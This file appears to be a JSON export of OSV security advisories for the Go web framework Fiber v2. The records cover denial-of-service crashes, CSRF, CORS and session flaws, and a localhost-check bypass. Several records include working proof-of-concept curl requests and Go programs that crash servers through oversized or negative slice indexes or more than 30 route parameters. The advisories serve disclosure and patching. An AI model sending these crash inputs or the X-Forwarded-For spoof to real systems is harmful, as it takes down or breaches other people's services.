{"ecosystem":"go","package":"github.com/gofiber/fiber/v2","version":null,"bugs":[{"id":5234,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.9","bug_id":"osv:GHSA-qx2q-88mx-vhg7","title":"Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder","description":"### Description\n\nWhen using Fiber's `Ctx.BodyParser` to parse form data containing a large numeric key that represents a slice index (e.g., `test.18446744073704`), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder.\n\nThe root cause is that the decoder attempts to allocate a slice of length `idx + 1` without validating whether the index is within a safe or reasonable range. If `idx` is excessively large, this leads to an integer overflow or memory exhaustion, causing a panic or crash.\n\n\n### Steps to Reproduce\n\nCreate a POST request handler that accepts `x-www-form-urlencoded` data\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct{} `form:\"test\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(&formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n\t\treturn nil\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\nRun the server and send a POST request with a large numeric key in form data, such as:\n\n```bash\ncurl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \\\n  -H 'Content-Type: application/x-www-form-urlencoded'\n```\n\n\n### Relevant Code Snippet\n\nWithin the decoder's [decode method](https://github.com/gofiber/fiber/blob/v2.52.8/internal/schema/decoder.go#L249):\n\n```go\nidx := parts[0].index\nif v.IsNil() || v.Len() < idx+1 {\n    value := reflect.MakeSlice(t, idx+1, idx+1)  // <-- Panic/crash occurs here when idx is huge\n    if v.Len() < idx+1 {\n        reflect.Copy(value, v)\n    }\n    v.Set(value)\n}\n```\n\nThe `idx` is not validated before use, leading to unsafe slice allocation for extremely large values.\n\n---\n\n### Impact\n\n- Application panic or crash on malicious or malformed input.\n- Potential denial of service (DoS) via memory exhaustion or server crash.\n- Lack of defensive checks in the parsing code causes instability.","severity":"high","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-qx2q-88mx-vhg7","labels":["CVE-2025-54801","GO-2025-3845"],"created_at":"2026-04-26 03:01:59.043201+00:00","updated_at":"2026-04-26 03:01:59.043201+00:00"},{"id":5233,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GHSA-mv73-f69x-444p","title":"Go Fiber CSRF Token Validation Vulnerability","description":"A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the application, which allows an attacker to obtain tokens and forge malicious requests on behalf of a user. This can lead to unauthorized actions being taken on the user's behalf, potentially compromising the security and integrity of the application.\n\n## Vulnerability Details\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The following issues were identified:\n\n1. **Lack of Token Association**: The CSRF token was validated against tokens in storage but was not tied to the original requestor that generated it, allowing for token reuse.\n\n## Remediation\n\nTo remediate this vulnerability, it is recommended to take the following actions:\n\n1. **Update the Application**: Upgrade the application to a fixed version with a patch for the vulnerability.\n\n2. **Implement Proper CSRF Protection**: Review the updated documentation and ensure your application's CSRF protection mechanisms follow best practices.\n\n4. **Choose CSRF Protection Method**: Select the appropriate CSRF protection method based on your application's requirements, either the Double Submit Cookie method or the Synchronizer Token Pattern using sessions.\n\n5. **Security Testing**: Conduct a thorough security assessment, including penetration testing, to identify and address any other security vulnerabilities.\n\n## Defence-in-depth\n\nUsers should take additional security measures like captchas or Two-Factor Authentication (2FA) and set Session cookies with SameSite=Lax or SameSite=Strict, and the Secure and HttpOnly attributes.","severity":"high","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mv73-f69x-444p","labels":["CVE-2023-45141","GO-2023-2116"],"created_at":"2026-04-26 03:01:59.040594+00:00","updated_at":"2026-04-26 03:01:59.040594+00:00"},{"id":5231,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":"2.52.6","fixed_version":"2.52.7","bug_id":"osv:GHSA-hg3g-gphw-5hhm","title":"Fiber panics when fiber.Ctx.BodyParser parses invalid range index","description":"### Summary\nWhen using the `fiber.Ctx.BodyParser` to parse into a struct with range values, a panic occurs when trying to parse a negative range index\n\n### Details\n`fiber.Ctx.BodyParser` can map flat data to nested slices using `key[idx]value` syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data. \n\nSince this data is user-provided, this could lead to denial of service for anyone relying on this `fiber.Ctx.BodyParser`  functionality  \n\n### Reproducing\nTake a simple GoFiberV2 server which returns a JSON encoded version of the FormData\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct {\n\t\tValue string `form:\"value\"`\n\t} `form:\"nested-content\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(&formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n                c.Set(\"Content-Type\", \"application/json\")\n                s, _ := json.Marshal(formData)\n                return c.SendString(string(s))\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\n**Correct Behaviour**\nSend a valid request such as:\n```bash\ncurl --location 'localhost:3000' \\\n--form 'nested-content[0].value=\"Foo\"' \\\n--form 'nested-content[1].value=\"Bar\"'\n```\nYou recieve valid JSON\n```json\n{\"NestedContent\":[{\"Value\":\"Foo\"},{\"Value\":\"Bar\"}]}\n```\n\n**Crashing behaviour**\nSend an invalid request such as:\n```bash\ncurl --location 'localhost:3000' \\\n--form 'nested-content[-1].value=\"Foo\"'\n```\nThe server panics and crashes\n```\npanic: reflect: slice index out of range\n\ngoroutine 8 [running]:\nreflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)\n        /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167\ngithub.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})\n[...]\n```\n\n### Impact\nAnyone using `fiber.Ctx.BodyParser` can/will have their servers crashed when an invalid payload is sent","severity":"high","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm","labels":["CVE-2025-48075","GO-2025-3706"],"created_at":"2026-04-26 03:01:59.032532+00:00","updated_at":"2026-04-26 03:01:59.032532+00:00"},{"id":5243,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.12","bug_id":"osv:GO-2026-4543","title":"Fiber has a Denial of Service Vulnerability via Route Parameter Overflow in github.com/gofiber/fiber","description":"Fiber has a Denial of Service Vulnerability via Route Parameter Overflow in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mrq8-rjmw-wpq3","labels":["CVE-2026-25882","GHSA-mrq8-rjmw-wpq3"],"created_at":"2026-04-26 03:01:59.066857+00:00","updated_at":"2026-04-26 03:01:59.066857+00:00"},{"id":5242,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.11","bug_id":"osv:GO-2026-4471","title":"Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() on crypto/rand failure in github.com/gofiber/fiber","description":"Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() — predictable / zero‑UUID on crypto/rand failure in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-68rr-p4fp-j59v","labels":["CVE-2025-66630","GHSA-68rr-p4fp-j59v"],"created_at":"2026-04-26 03:01:59.064206+00:00","updated_at":"2026-04-26 03:01:59.064206+00:00"},{"id":5241,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.9","bug_id":"osv:GO-2025-3845","title":"Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder in github.com/gofiber/fiber","description":"Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-qx2q-88mx-vhg7","labels":["CVE-2025-54801","GHSA-qx2q-88mx-vhg7"],"created_at":"2026-04-26 03:01:59.061579+00:00","updated_at":"2026-04-26 03:01:59.061579+00:00"},{"id":5240,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":"2.52.6","fixed_version":"2.52.7","bug_id":"osv:GO-2025-3706","title":"Fiber panics when fiber.Ctx.BodyParser parses invalid range index in github.com/gofiber/fiber","description":"Fiber panics when fiber.Ctx.BodyParser parses invalid range index in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm","labels":["CVE-2025-48075","GHSA-hg3g-gphw-5hhm"],"created_at":"2026-04-26 03:01:59.058963+00:00","updated_at":"2026-04-26 03:01:59.058963+00:00"},{"id":5239,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.5","bug_id":"osv:GO-2024-2959","title":"Session Middleware Token Injection Vulnerability in github.com/gofiber/fiber","description":"Session Middleware Token Injection Vulnerability in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-98j2-3j3p-fw2v","labels":["CVE-2024-38513","GHSA-98j2-3j3p-fw2v"],"created_at":"2026-04-26 03:01:59.056312+00:00","updated_at":"2026-04-26 03:01:59.056312+00:00"},{"id":5238,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.1","bug_id":"osv:GO-2024-2574","title":"Insecure CORS Configuration allowing wildcard origin with credentials in github.com/gofiber/fiber/v2","description":"The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (\"*\") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg","labels":["CVE-2024-25124","GHSA-fmg4-x8pw-hjhg"],"created_at":"2026-04-26 03:01:59.053703+00:00","updated_at":"2026-04-26 03:01:59.053703+00:00"},{"id":5237,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GO-2023-2116","title":"CSRF token validation vulnerability in github.com/gofiber/fiber/v2","description":"A cross-site request forgery vulnerability can allow an attacker to obtain tokens and forge malicious requests on behalf of a user. This can lead to unauthorized actions being taken on the user's behalf, potentially compromising the security and integrity of the application.\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The CSRF token is validated against tokens in storage but was is not tied to the original requestor that generated it, allowing for token reuse.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mv73-f69x-444p","labels":["CVE-2023-45141","GHSA-mv73-f69x-444p"],"created_at":"2026-04-26 03:01:59.051048+00:00","updated_at":"2026-04-26 03:01:59.051048+00:00"},{"id":5236,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GO-2023-2115","title":"CSRF token reuse vulnerability in github.com/gofiber/fiber/v2","description":"A cross-site request forgery vulnerability in this package can allow an attacker to inject arbitrary values and forge malicious requests on behalf of a user. The attacker may inject arbitrary values without any authentication, or perform various malicious actions on behalf of an authenticated user, potentially compromising the security and integrity of the application.\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. For 'safe' methods, the token is extracted from the cookie and saved to storage without further validation or sanitization. In addition, the CSRF token is validated against tokens in storage but not associated with a session, nor by using a Double Submit Cookie Method, allowing for token reuse.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-94w9-97p3-p368","labels":["CVE-2023-45128","GHSA-94w9-97p3-p368"],"created_at":"2026-04-26 03:01:59.048392+00:00","updated_at":"2026-04-26 03:01:59.048392+00:00"},{"id":5235,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.49.2-0.20230906112033-b8c9ede6efa2","bug_id":"osv:GO-2023-2052","title":"IsFromLocal local address check can be circumvented in github.com/gofiber/fiber/v2","description":"The Ctx.IsFromLocal function can incorrectly report a request as being sent from localhost when the request contains an X-Forwarded-For header containing a localhost IP address.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-3q5p-3558-364f","labels":["CVE-2023-41338","GHSA-3q5p-3558-364f"],"created_at":"2026-04-26 03:01:59.045857+00:00","updated_at":"2026-04-26 03:01:59.045857+00:00"},{"id":5232,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.12","bug_id":"osv:GHSA-mrq8-rjmw-wpq3","title":"Fiber has a Denial of Service Vulnerability via Route Parameter Overflow","description":"A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.\n\n## Affected Versions\n\n- **Fiber v3.0.0-rc.3** and earlier v3 releases\n- **Fiber v2.52.10** and potentially all v2 releases (confirmed exploitable)\n- Both versions share the same vulnerable routing implementation\n\n## Vulnerability Details\n\n### Root Cause\n\nBoth Fiber v2 and v3 define a fixed-size parameter array in `ctx.go`:\n\n```go\nconst maxParams = 30\n\ntype DefaultCtx struct {\n    values [maxParams]string  // Fixed 30-element array\n    // ...\n}\n```\n\nThe `router.go` `register()` function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in `path.go` performs an unbounded write:\n\n- **v3**: `path.go:514`\n- **v2**: `path.go:516`\n\n```go\n// path.go:514 - NO BOUNDS CHECKING\nparams[paramsIterator] = path[:i]\n```\n\nWhen `paramsIterator >= 30`, this triggers:\n```\npanic: runtime error: index out of range [30] with length 30\n```\n\n### Attack Scenario\n\n1. Application registers route with >30 parameters (e.g., via code or dynamic routing):\n   ```go\n   app.Get(\"/api/:p1/:p2/:p3/.../p35\", handler)\n   ```\n\n2. Attacker sends matching HTTP request:\n   ```bash\n   curl http://target/api/v1/v2/v3/.../v35\n   ```\n\n3. Server crashes during request processing with runtime panic\n\n## Proof of Concept\n\n### For Fiber v3\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v3\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"✓ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9999\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9999/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\n🔴 Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:514 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"✗ Request failed: %v\\n\", err)\n\t\tfmt.Println(\"💥 Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output:**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\n✓ Registration succeeded (NO PANIC)\n\n🔴 Sending exploit request...\nExpected: panic at path.go:514 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v3.(*routeParser).getMatch(...)\n\t/path/to/fiber/path.go:514\ngithub.com/gofiber/fiber/v3.(*Route).match(...)\n\t/path/to/fiber/router.go:89\ngithub.com/gofiber/fiber/v3.(*App).next(...)\n\t/path/to/fiber/router.go:142\n```\n\n### For Fiber v2\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v2\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c *fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"✓ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9998\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9998/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\n🔴 Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:516 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"✗ Request failed: %v\\n\", err)\n\t\tfmt.Println(\"💥 Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output (v2):**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\n✓ Registration succeeded (NO PANIC)\n\n🔴 Sending exploit request...\nExpected: panic at path.go:516 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v2.(*routeParser).getMatch(...)\n\t/path/to/fiber/v2@v2.52.10/path.go:512\ngithub.com/gofiber/fiber/v2.(*Route).match(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:84\ngithub.com/gofiber/fiber/v2.(*App).next(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:127\n```\n\n## Impact\n\n### Exploitation Requirements\n- No authentication required\n- Single HTTP request triggers crash\n- Trivially scriptable for sustained DoS\n- Works against any route with >30 parameters\n\n### Real-World Impact\n- **Public APIs**: Remote DoS attacks on vulnerable endpoints\n- **Microservices**: Cascade failures if vulnerable service is critical\n- **Auto-scaling**: Repeated crashes prevent proper recovery\n- **Monitoring**: Log flooding and alert fatigue\n\n### Likelihood\n**HIGH** - Exploitation requires only:\n- Knowledge of route structure (often public in APIs)\n- Standard HTTP client (curl, browser, etc.)\n- Single malformed request\n\n## Workarounds\n\nUntil patched, users should:\n\n1. **Audit Routes**: Ensure all routes have ≤30 parameters\n   ```bash\n   # Search for potential issues\n   grep -r \"/:.*/:.*/:.*\" . | grep -v node_modules\n   ```\n\n2. **Disable Dynamic Routing**: If programmatically registering routes, validate parameter count:\n   ```go\n   paramCount := strings.Count(route, \":\")\n   if paramCount > 30 {\n       log.Fatal(\"Route exceeds maxParams\")\n   }\n   ```\n\n3. **Rate Limiting**: Deploy aggressive rate limiting to mitigate DoS impact\n\n4. **Monitoring**: Alert on panic patterns in application logs\n\n## Timeline\n\n- **2024-12-24**: Vulnerability discovered in v3 during PR #3962 review\n- **2024-12-25**: Proof of concept confirmed exploitability in v3\n- **2024-12-25**: Vulnerability confirmed to also exist in v2 (same root cause)\n- **2024-12-25**: Security advisory created\n\n## References\n\n- **v3 Related PR**: https://github.com/gofiber/fiber/pull/3962 (UpdateParam feature with defensive checks, doesn't fix root cause)\n- **Vulnerable Code Locations**:\n  - v3: [path.go:514](https://github.com/gofiber/fiber/blob/main/path.go#L514)\n  - v2: [path.go:516](https://github.com/gofiber/fiber/blob/v2/path.go#L516)\n\n## Credit\n\n**Discovered by:** @sixcolors (Fiber maintainer) and @TheAspectDev","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mrq8-rjmw-wpq3","labels":["CVE-2026-25882","GO-2026-4543"],"created_at":"2026-04-26 03:01:59.035252+00:00","updated_at":"2026-04-26 03:01:59.035252+00:00"},{"id":5227,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":"2.0.0","fixed_version":"2.43.0","bug_id":"osv:GHSA-927h-x4qj-r242","title":"github.com/gofiber/fiber/v2 vulnerable to Origin Validation Error","description":"The Olivier Poitrey Go CORS handler through 1.3.0 actively converts a wildcard CORS policy into reflecting an arbitrary Origin header value, which is incompatible with the CORS security design, and could lead to CORS misconfiguration security problems.","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-20744","labels":["CVE-2018-20744","GO-2023-1792"],"created_at":"2026-04-26 03:01:59.021917+00:00","updated_at":"2026-04-26 03:01:59.021917+00:00"},{"id":5225,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.49.2","bug_id":"osv:GHSA-3q5p-3558-364f","title":"Fiber unauthorized access vulnerability in `ctx.IsFromLocal()`","description":"### Impact\nThis vulnerability can be categorized as a security misconfiguration. It impacts users of our project who rely on the [ctx.IsFromLocal()](https://docs.gofiber.io/api/ctx#isfromlocal) method to restrict access to localhost requests. If exploited, it could allow unauthorized access to resources intended only for localhost.\n\nIn it's implementation it uses c.IPs():\n\n```go\n// IPs returns a string slice of IP addresses specified in the X-Forwarded-For request header.\n// When IP validation is enabled, only valid IPs are returned.\nfunc (c *Ctx) IPs() []string {\n    return c.extractIPsFromHeader(HeaderXForwardedFor)\n}\n```\n\nThereby, setting `X-Forwarded-For: 127.0.0.1` in a request from a foreign host, will result in true for [ctx.IsFromLocal()](https://docs.gofiber.io/api/ctx#isfromlocal) \n\n### Patches\nThis issue has been patched in `v2.49.2` with commit [b8c9ede6efa231116c4bd8bb9d5e03eac1cb76dc](https://github.com/gofiber/fiber/commit/b8c9ede6efa231116c4bd8bb9d5e03eac1cb76dc)\n\n### Workarounds\nCurrently, there are no known workarounds to remediate this vulnerability without upgrading to the patched version. We strongly advise users to apply the patch as soon as it is released.\n\n### References\nFor further information and context regarding this security issue, please refer to the following resources:\n\n- [Mozilla Developer Network - X-Forwarded-For](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For)\n\n","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-3q5p-3558-364f","labels":["CVE-2023-41338","GO-2023-2052"],"created_at":"2026-04-26 03:01:59.007997+00:00","updated_at":"2026-04-26 03:01:59.007997+00:00"},{"id":5230,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.1","bug_id":"osv:GHSA-fmg4-x8pw-hjhg","title":"Fiber has Insecure CORS Configuration, Allowing Wildcard Origin with Credentials","description":"The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (\"*\") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.\n\n## Impact\nThe impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references.\n\n## Proof of Concept\nThe code in cors.go allows setting a wildcard in the AllowOrigins while having AllowCredentials set to true, which could lead to various vulnerabilities.\n\n## Potential Solution\nHere is a potential solution to ensure the CORS configuration is secure:\n\n```go\nfunc New(config ...Config) fiber.Handler {\n    if cfg.AllowCredentials && cfg.AllowOrigins == \"*\" {\n        panic(\"[CORS] Insecure setup, 'AllowCredentials' is set to true, and 'AllowOrigins' is set to a wildcard.\")\n    }\n    // Return new handler goes below\n}\n\nThe middleware will not allow insecure configurations when using `AllowCredentials` and `AllowOrigins`.\n```\n\n## Workarounds\nFor the meantime, users are advised to manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. The browser fetch api, browsers and utilities that enforce CORS policies are not affected by this.\n\n## References\n[MDN Web Docs on CORS Errors](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials)\n[CodeQL on CORS Misconfiguration](https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials/)\n[PortSwigger on Exploiting CORS Misconfigurations](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n[WhatWG CORS protocol and credentials ](https://fetch.spec.whatwg.org/#cors-protocol-and-credentials)","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg","labels":["CVE-2024-25124","GO-2024-2574"],"created_at":"2026-04-26 03:01:59.029875+00:00","updated_at":"2026-04-26 03:01:59.029875+00:00"},{"id":5229,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.5","bug_id":"osv:GHSA-98j2-3j3p-fw2v","title":"Session Middleware Token Injection Vulnerability","description":"A security vulnerability has been identified in the Fiber session middleware where a user can supply their own session_id value, leading to the creation of a session with that key.\n\n## Impact\nThe identified vulnerability is a session middleware issue in GoFiber versions 2 and above. This vulnerability allows users to supply their own session_id value, resulting in the creation of a session with that key. If a website relies on the mere presence of a session for security purposes, this can lead to significant security risks, including unauthorized access and session fixation attacks. All users utilizing GoFiber's session middleware in the affected versions are impacted.\n\n## Patches\nThe issue has been addressed in the latest patch. Users are strongly encouraged to upgrade to version 2.52.5 or higher to mitigate this vulnerability.\n\n## Workarounds\nUsers who are unable to upgrade immediately can apply the following workarounds to reduce the risk:\n\n1. **Validate Session IDs**: Implement additional validation to ensure session IDs are not supplied by the user and are securely generated by the server.\n2. **Session Management**: Regularly rotate session IDs and enforce strict session expiration policies.\n\n## References\nFor more information on session best practices:\n- [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)\n\nUsers are encouraged to review these references and take immediate action to secure their applications.","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-98j2-3j3p-fw2v","labels":["CVE-2024-38513","GO-2024-2959"],"created_at":"2026-04-26 03:01:59.027223+00:00","updated_at":"2026-04-26 03:01:59.027223+00:00"},{"id":5228,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GHSA-94w9-97p3-p368","title":"CSRF Token Reuse Vulnerability","description":"A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the application, which allows an attacker to inject arbitrary values and forge malicious requests on behalf of a user. This vulnerability can allow an attacker to inject arbitrary values without any authentication, or perform various malicious actions on behalf of an authenticated user, potentially compromising the security and integrity of the application.\n\n## Vulnerability Details\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The following issues were identified:\n\n1. **Token Injection**: For 'safe' methods, the token was extracted from the cookie and saved to storage without further validation or sanitization.\n\n2. **Lack of Token Association**: The CSRF token was validated against tokens in storage but not associated with a session, nor by using a Double Submit Cookie Method, allowing for token reuse.\n\n### Specific Go Packages Affected\ngithub.com/gofiber/fiber/v2/middleware/csrf\n\n## Remediation\n\nTo remediate this vulnerability, it is recommended to take the following actions:\n\n1. **Update the Application**: Upgrade the application to a fixed version with a patch for the vulnerability.\n\n2. **Implement Proper CSRF Protection**: Review the updated documentation and ensure your application's CSRF protection mechanisms follow best practices.\n\n4. **Choose CSRF Protection Method**: Select the appropriate CSRF protection method based on your application's requirements, either the Double Submit Cookie method or the Synchronizer Token Pattern using sessions.\n\n5. **Security Testing**: Conduct a thorough security assessment, including penetration testing, to identify and address any other security vulnerabilities.\n\n## Defence-in-depth\n\nUsers should take additional security measures like captchas or Two-Factor Authentication (2FA) and set Session cookies with SameSite=Lax or SameSite=Secure, and the Secure and HttpOnly attributes.","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-94w9-97p3-p368","labels":["CVE-2023-45128","GO-2023-2115"],"created_at":"2026-04-26 03:01:59.024580+00:00","updated_at":"2026-04-26 03:01:59.024580+00:00"},{"id":5226,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.11","bug_id":"osv:GHSA-68rr-p4fp-j59v","title":"Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() — predictable / zero‑UUID on crypto/rand failure","description":"Fiber v2 contains an internal vendored copy of `gofiber/utils`, and its functions `UUIDv4()` and `UUID()` inherit the same 